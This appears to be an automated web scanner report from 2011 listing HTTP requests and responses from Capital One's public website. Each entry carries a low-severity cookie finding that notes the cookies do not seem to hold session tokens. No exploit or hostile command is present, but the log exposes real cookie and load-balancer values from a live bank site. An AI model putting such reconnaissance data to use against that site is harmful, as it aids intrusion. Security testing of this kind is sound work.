GET /financialeducation/creditcardact/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:39 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:39 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 24653
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Credi ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /fraud/prevention/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:37 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D1; expires=Thu, 02-Feb-2012 22:12:37 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 37509
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Capit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /legal/privacy.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 02 Feb 2011 22:12:41 GMT Server: Apache Location: https://www.capitalone.com/protection/privacy/index.php Cache-Control: max-age=0 Expires: Wed, 02 Feb 2011 22:12:41 GMT Content-Length: 263 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="https://www.capitalone. ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /legal/security.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 02 Feb 2011 22:12:42 GMT Server: Apache Location: http://www.capitalone.com/protection/security/index.php Cache-Control: max-age=0 Expires: Wed, 02 Feb 2011 22:12:42 GMT Content-Length: 263 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.capitalone.c ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /legal/terms.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:42 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 29875
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Capital One ­ Terms and Conditions</title> <link href="/stylesheets/ ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /loans/?linkid=WWW_1009_PERS_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_H1_14_T_LNHPR HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:23 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:23 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 22518
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Capital One offer ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /media/pdf/Foreign_Bank_Account_Certification_-_Capital_One.pdf HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:43 GMT Server: Apache Cache-Control: max-age=3600 Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 04 Dec 2009 19:11:12 GMT Accept-Ranges: bytes Content-Length: 207453 Vary: User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: application/pdf Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
%PDF-1.4%.... 16 0 obj <</Linearized 1/L 207453/O 18/E 75169/N 4/T 207086/H [ 436 150]>>endobj xref 16 7 0000000016 00000 n 0000000586 00000 n 0000000648 00000 n 0000000779 0 ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /onlinebanking/overview.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:36 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:36 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 23649
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title> Capi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /onlineopinionF3cS/oo_conf_en-US.js HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:44 GMT Server: Apache Last-Modified: Mon, 29 Jun 2009 18:38:55 GMT Accept-Ranges: bytes Content-Length: 1602 Expires: Thu, 03 Feb 2011 22:12:44 GMT Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: application/x-javascript Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
/* OnlineOpinion (F3cS,en-US) */ /* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */ var O_pth='/online ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /onlineopinionF3cS/oo_engine.js HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:44 GMT Server: Apache Last-Modified: Mon, 12 Jun 2006 14:35:32 GMT Accept-Ranges: bytes Content-Length: 7305 Expires: Thu, 03 Feb 2011 22:12:44 GMT Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: application/x-javascript Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
/* OnlineOpinion (F3cS,8448b) */ /* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */ var custom_var,O_t ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /personalloans/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:27 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:27 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 21748
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Personal Loans: A ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /protection/privacy/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:36 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:36 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 23417
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Capit ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /protection/security/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:37 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:37 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 26756
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Capit ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /redirect.php?Log=1&linkid=WWW_1009_CARD_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_H1_04_T_EXP&dest=https://cardfinder.capitalone.com/CapOne/findMyOffer.do?ex=R&pr=&id=&tg=4 HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 302 Found Date: Wed, 02 Feb 2011 22:11:48 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=f9be28ebS04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3PjmqKSgtyQ1OKS9KL80gKgNkuILkNDoEagojygcQA%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com Location: https://cardfinder.capitalone.com/CapOne/findMyOffer.do?ex=R&pr=&id=&tg=20&pnt=ZZZZ00ZZZZZZZZZZZZZZ&ch=UNS&wtg=11 Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Content-Length: 1 Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /rewards/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:50 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:11:50 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 26772
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Credi ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /rewards/service-login.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:49 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D4; expires=Thu, 02-Feb-2012 22:11:49 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 20960
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>No Ha ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sitemap/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:34 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:34 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 42178
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Capital One - Sit ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000
Response
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:19 GMT
Server: Apache
Set-Cookie: v1st=FBBE6C4A1C9B8436; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Cache-Control: no-cache, no-store, must-revalidate
